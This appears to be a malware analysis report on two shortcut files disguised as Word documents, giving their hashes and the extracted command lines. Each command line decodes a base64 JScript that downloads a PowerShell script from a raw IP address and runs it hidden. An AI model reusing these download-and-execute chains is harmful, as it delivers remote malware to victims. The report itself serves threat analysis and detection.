|
Hash | Hash Value |
|---|---|
| MD5 | 4e90cc212b68d5f1e3afe4e6c3a96090
|
| Sha1 | eb801408c86faf594a6aab2ad651a22ef1374988
|
| Sha256 | b4c56effba0516161bf59022f137837ccf852825e5fa09d15b9a8bf8295fbde2
|
| Sha384 | 0e7419d46d083f4652f04e61e45bc4bdcfdd5e71371c2e4c6bbe0214d6b87cacfa95f4a4a7b349fb759464b4f6f8e8d9
|
| Sha512 | c830cee99cad715d7c275bfc4498f594eb41e662860c1e2e2d2fb30fccb9a8706cad7215b07c44bd6b97551be24aed660e13c27363dd0653be9e3e8e6ad3691a
|
| SSDeep | 48:M7PqcanNnty7KEu+njtzCM7PqHan6JHHmtu9lcBXuz/B7o/007DX:M7icyNr+njpX7iHy6JHqa7c7z
|
| TLSH | E152CF3071F9211CE5F3FF71ACA466C6DEABF9B3BA7112694542160A0A01E40ED25B3B
|
|
Name | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL3Nwb25zb3JpbnB1dC5wczEiLGZhbHNlKTtoLnNldFJlcXVlc3RIZWFkZXIoIlVzZXItQWdlbnQiLCJVQSBXaW5kb3dzUG93ZXJTaGVsbCIpO2guc2VuZCgpO25ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpLlNoZWxsRXhlY3V0ZSgicG93ZXJzaGVsbC5leGUiLCItTm9QIC1XIEhpZGRlbiAtQyAiK2gucmVzcG9uc2VUZXh0LCIiLCJvcGVuIiwwKTs= > bCP.b64 && certutil -decode bCP.b64 PoIQJ.js >nul && wscript //b PoIQJ.js && del bCP.b64 PoIQJ.js" |
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL2ZpZnRoYmVsb25nLnBzMSIsZmFsc2UpO2guc2V0UmVxdWVzdEhlYWRlcigiVXNlci1BZ2VudCIsIlVBIFdpbmRvd3NQb3dlclNoZWxsIik7aC5zZW5kKCk7bmV3IEFjdGl2ZVhPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikuU2hlbGxFeGVjdXRlKCJwb3dlcnNoZWxsLmV4ZSIsIi1Ob1AgLVcgSGlkZGVuIC1DICIraC5yZXNwb25zZVRleHQsIiIsIm9wZW4iLDApOw== > yO.b64 && certutil -decode yO.b64 5G9X2.js >nul && wscript //b 5G9X2.js && del yO.b64 5G9X2.js" |
|
Name | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL3Nwb25zb3JpbnB1dC5wczEiLGZhbHNlKTtoLnNldFJlcXVlc3RIZWFkZXIoIlVzZXItQWdlbnQiLCJVQSBXaW5kb3dzUG93ZXJTaGVsbCIpO2guc2VuZCgpO25ldyBBY3RpdmVYT2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpLlNoZWxsRXhlY3V0ZSgicG93ZXJzaGVsbC5leGUiLCItTm9QIC1XIEhpZGRlbiAtQyAiK2gucmVzcG9uc2VUZXh0LCIiLCJvcGVuIiwwKTs= > bCP.b64 && certutil -decode bCP.b64 PoIQJ.js >nul && wscript //b PoIQJ.js && del bCP.b64 PoIQJ.js" Malicious |
4e90cc212b68d5f1e3afe4e6c3a96090 > SPYSOK_mayna.docx.lnk |
| LNK: Command Execution | cmd.exe /c "cd /d %TEMP% && echo dmFyIGg9bmV3IEFjdGl2ZVhPYmplY3QoIk1TWE1MMi5TZXJ2ZXJYTUxIVFRQLjYuMCIpO2gub3BlbigiR0VUIiwiaHR0cDovLzE5My4xNjkuMTk0Ljg2L2NyNDRnL2ZpZnRoYmVsb25nLnBzMSIsZmFsc2UpO2guc2V0UmVxdWVzdEhlYWRlcigiVXNlci1BZ2VudCIsIlVBIFdpbmRvd3NQb3dlclNoZWxsIik7aC5zZW5kKCk7bmV3IEFjdGl2ZVhPYmplY3QoIlNoZWxsLkFwcGxpY2F0aW9uIikuU2hlbGxFeGVjdXRlKCJwb3dlcnNoZWxsLmV4ZSIsIi1Ob1AgLVcgSGlkZGVuIC1DICIraC5yZXNwb25zZVRleHQsIiIsIm9wZW4iLDApOw== > yO.b64 && certutil -decode yO.b64 5G9X2.js >nul && wscript //b 5G9X2.js && del yO.b64 5G9X2.js" Malicious |
4e90cc212b68d5f1e3afe4e6c3a96090 > NAKAZ_MO_perevirka_mayna.docx.lnk |